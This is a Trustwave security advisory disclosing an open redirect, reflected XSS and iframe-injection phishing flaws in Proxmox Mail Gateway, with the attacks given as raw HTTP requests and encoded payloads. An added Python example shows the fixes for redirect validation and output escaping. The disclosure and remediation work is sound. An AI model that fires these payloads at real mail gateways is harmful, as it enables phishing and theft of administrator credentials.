Trustwave SpiderLabs Security Advisory TWSL2015-024:
Multiple Vulnerabilities in Proxmox Mail Gateway

Published: 12/30/2015
Version: 1.0

Vendor: Proxmox Server Solutions GmbH (https://www.proxmox.com/)
Products: Proxmox Mail Gateway
Version affected: prior to hotfix 4.0-8-097d26a9

Product description:
Proxmox Mail Gateway protects email servers from spam, viruses, Trojans and phishing emails. The web-based management interface gives the administrator control over all functionality, including the message tracking center, which collects and displays all available logs in an easy-to-understand summary, a useful tool for help desks. The installation medium (CD or USB) is a complete operating system that includes everything needed to install and run Proxmox Mail Gateway in a few minutes. It can be installed on bare metal and on almost all leading virtualization platforms.

Finding 1: Arbitrary Site Redirection Vulnerability
Credit: Piotr Karolak of Trustwave SpiderLabs

Input passed via the 'destination' parameter of the login form is not properly verified before being used to redirect the user once the form is submitted. An attacker can construct a crafted URI and entice a user to follow it; when the victim follows the link and logs in, they are redirected to an attacker-controlled site, which may aid phishing attacks. In the request below the freshly authenticated user is sent to www.example.com.

REQUEST:
========
POST /nrd/LOGIN HTTP/1.1
Content-Length: 71
Content-Type: application/x-www-form-urlencoded
Host: a.b.c.d
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*

credential_0=root&credential_1=admin&destination=http://www.example.com

Finding 2: Reflected Cross-site Scripting Vulnerability
Credit: Piotr Karolak of Trustwave SpiderLabs

Multiple reflected cross-site scripting (XSS) vulnerabilities were discovered in the product. The requests below were captured within an authenticated session (note the ProxmoxAuthCookie), so the target is a logged-in user, typically the administrator, who is enticed to open a crafted link.

1.
Performing XSS on /users/index.htm

REQUEST:
========
GET /users/index.htm/'onmouseover%3d'prompt("XSS")'bad%3d'> HTTP/1.1
Referer: https://a.b.c.d/
Cookie: ProxmoxAuthCookie=root::root::1423157033::1528f0e31aa5352ed990e3a240e186356e278b6d; EMBPERL_UID=902ea1c4fac106dd826dc1733ef8f7d7
Host: a.b.c.d
Connection: Keep-alive
Accept: */*

2. Performing XSS on /quarantine/spam/manage.htm
https://a.b.c.d/quarantine/spam/manage.htm/%27onmouseover=%22alert%281362%29%22

3. Performing XSS on /quarantine/spam/whitelist.htm
https://a.b.c.d/quarantine/spam/whitelist.htm/%27onmouseover=%22alert%281364%29%22

4. Performing XSS on /queues/mail/index/
https://a.b.c.d/queues/mail/index/%27+alert%281369%29+%27?action=vcdiscard

5. Performing XSS on /system/ssh.htm
https://a.b.c.d/system/ssh.htm?action=delitem&itype=n%27%2Balert%28938%29%2B%27&aa=10.0.0.0/255.0.0.0

6. Performing XSS on /queues/mail/?domain= by injecting '

REQUEST:
========
HTTP/1.1
Cookie: EMBPERL_UID=0667ff0a593b17dbcf0a5dc8838e0b8a; ProxmoxAuthCookie=root::root::1422739689::a19ceda9cbfa7b6285d234588b26eb99ed2eb2ab
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://a.b.c.d/queues/mail/
Host: a.b.c.d

Both the 'domain' and 'qid' parameters can be set to '%3E%22%27%3E%3Cscript%3Ealert%2890%29%3C%2Fscript%3E'.

7.
Performing XSS on /quarantine/virus/manage.htm

REQUEST:
========
POST /quarantine/virus/manage.htm HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: EMBPERL_UID=0667ff0a593b17dbcf0a5dc8838e0b8a; ProxmoxAuthCookie=root::root::1422739576::2ad984cb8219860ae1c1c0e5910a45daf273831f
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://a.b.c.d/quarantine/virus/manage.htm
Host: a.b.c.d
Content-Length: 125

filter=>"'>&frm_submit=>"'>

Both the 'filter' and 'frm_submit' parameters can be set to '%3E%22%27%3E%3Cscript%3Ealert%28151%29%3C%2Fscript%3E'.

Finding 3: Phishing Vector Vulnerability
Credit: Piotr Karolak of Trustwave SpiderLabs

1. Performing Phishing

Setting the 'domain' parameter to 'domain.tld%27%22%3E%3Ciframe+id%3D441+src%3Dhttp%3A%2F%2Fexample.com%2Fphishing.html%3E' lets an attacker inject a frame or iframe tag with content of their choosing into the page. An incautious user may interact with the injected content without realizing that they have left the original site for an attacker-controlled one. Because the attacker's page is embedded inside the genuine application, a prompt to "log in again" looks far more credible than a standalone phishing page, and the attacker can harvest the victim's login credentials or other sensitive information such as usernames, passwords, credit card numbers or social security numbers.

REQUEST:
========
GET /queues/mail/?domain=domain.tld%27%22%3E%3Ciframe+id%3D441+src%3Dhttp%3A%2F%2Fexample.com%2Fsuperphishing.html%3E HTTP/1.1
Cookie: EMBPERL_UID=0667ff0a593b17dbcf0a5dc8838e0b8a; ProxmoxAuthCookie=root::root::1422739689::a19ceda9cbfa7b6285d234588b26eb99ed2eb2ab
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://a.b.c.d/queues/mail/
Host: a.b.c.d

2.
Performing Phishing

REQUEST:
========
POST /quarantine/virus/manage.htm HTTP/1.1
Host: a.b.c.f
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: EMBPERL_UID=658cafe5675e9f94b49492f20a665ac9; ProxmoxAuthCookie=root::root::1423513252::caeb9e659cf72f8b11f6d5f7e5608f58b35c7de0
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 112

filter=12'">&frm_submit=1

RESPONSE
========
Mail address filter: '>

No mails found.

The quote and angle bracket from the submitted 'filter' value come back in the response body unencoded, which is what allows the tag injection shown in the previous request.
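The two root causes behind the findings above, as an added example that is not part of the advisory or of Proxmox's code: Finding 1 accepts the 'destination' value as a redirect target unchecked, and Findings 2 and 3 echo request data ('filter', 'domain', a trailing path segment) into HTML without output encoding. The Python below shows each unsafe pattern next to a hardened version and runs the payload strings quoted in the findings through both renderers. The page template, the function names, the scanner-style `reflected_unencoded` oracle and the `/nrd/LOGIN` redirect handling are assumptions for illustration; the redirect check also goes beyond the advisory's single `http://` case and rejects the scheme-relative, backslash and triple-slash forms browsers treat as an external host.

```python
"""Added example for TWSL2015-024 (not Proxmox code): the root causes behind
Finding 1 and Findings 2/3, each shown as the unsafe pattern next to a
hardened version.  Page template and parameter handling are assumptions."""
import re
from html import escape
from urllib.parse import urlsplit, urlunsplit


# ---- Finding 1: 'destination' used as a redirect target unchecked -------------

def redirect_target_unsafe(destination):
    """Vulnerable pattern: whatever the login form posted becomes Location."""
    return destination or "/"


def redirect_target_safe(destination, default="/"):
    """Accept only a path on this site; anything else falls back to `default`.

    Rejected: absolute URLs (http://evil), scheme-relative (//evil), backslash
    variants (/\\evil) that browsers normalise to //evil, non-http schemes
    (javascript:) and control characters that could smuggle extra headers.
    The result is rebuilt from the parsed parts, so '///evil' (which browsers
    read as host 'evil') comes back as the harmless path '/evil'."""
    if not destination or any(ord(c) < 0x20 for c in destination):
        return default
    parts = urlsplit(destination)
    if parts.scheme or parts.netloc:
        return default
    path = parts.path
    if not path.startswith("/") or path.startswith("//") or "\\" in path:
        return default
    return urlunsplit(("", "", path, parts.query, ""))


# ---- Findings 2/3: request data echoed into HTML without encoding ------------

# Constructed stand-in for the quarantine page: the 'filter' value lands both in
# a single-quoted attribute and in the "Mail address filter: '...'" text.
TEMPLATE = ("<form><input name='filter' value='{f}'></form>\n"
            "<p>Mail address filter: '{f}'</p>\n"
            "<p>No mails found.</p>")


def filter_page_unsafe(filter_value):
    """Vulnerable pattern: the parameter is dropped into the markup as-is."""
    return TEMPLATE.format(f=filter_value)


def filter_page_safe(filter_value):
    """escape(..., quote=True) turns & < > " ' into entities, so the value can
    neither close the single-quoted attribute nor open a tag in the text."""
    return TEMPLATE.format(f=escape(filter_value, quote=True))


# Payload strings quoted in the findings (URL-decoded).
ADVISORY_PAYLOADS = {
    "filter":   ">\"'><script>alert(151)</script>",
    "domain":   "domain.tld'\"><iframe id=441 src=http://example.com/phishing.html>",
    "pathinfo": "'onmouseover=\"alert(1362)\"",
}

INJECTED_TAG = re.compile(r"<\s*/?\s*(script|iframe)\b", re.I)


def reflected_unencoded(page_html, payload):
    """The oracle a scanner applies after sending a marker: the payload comes
    back byte-for-byte.  Encoding changes at least one of < > " ' so it fails."""
    return payload in page_html


def audit():
    """Run every advisory payload through both renderers.
    Returns {name: (reflected by unsafe page, reflected by safe page)}."""
    return {name: (reflected_unencoded(filter_page_unsafe(p), p),
                   reflected_unencoded(filter_page_safe(p), p))
            for name, p in ADVISORY_PAYLOADS.items()}


if __name__ == "__main__":
    for dest in ("http://www.example.com", "//evil.example", "/\\evil.example",
                 "///evil.example", "javascript:alert(1)",
                 "/quarantine/spam/manage.htm?action=x"):
        print(f"{dest!r:42} -> {redirect_target_safe(dest)!r}")
    for name, (unsafe, safe) in audit().items():
        print(f"{name:9} reflected unencoded: unsafe={unsafe} safe={safe}")
    print("iframe present in unsafe page:",
          bool(INJECTED_TAG.search(filter_page_unsafe(ADVISORY_PAYLOADS["domain"]))))
```

The redirect check deliberately returns a rebuilt path rather than the caller's string: allow-listing by prefix ("starts with /") is the usual mistake, because `//host`, `/\host` and `///host` all start with `/` yet leave the origin once a browser normalises them. For the reflection side, one `escape(..., quote=True)` call covers both the attribute and the text context used here; a value placed inside a JavaScript block or a URL attribute would need the encoding for that context instead.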

Remediation Steps:
The vendor released hotfix-4-0-8-097d26a9-bin to mitigate these vulnerabilities. Please note that Trustwave SpiderLabs has not verified this fix.

Revision History:
03/18/2015 - Vulnerability disclosed to vendor
04/02/2015 - Patch released by vendor
12/30/2015 - Advisory published

References
1. https://www.proxmox.com/proxmox-mail-gateway/support

About Trustwave:
Trustwave helps businesses fight cybercrime, protect data and reduce security risk. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs. More than three million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective threat, vulnerability and compliance management. Trustwave is headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit https://www.trustwave.com.

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services. https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose.
In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.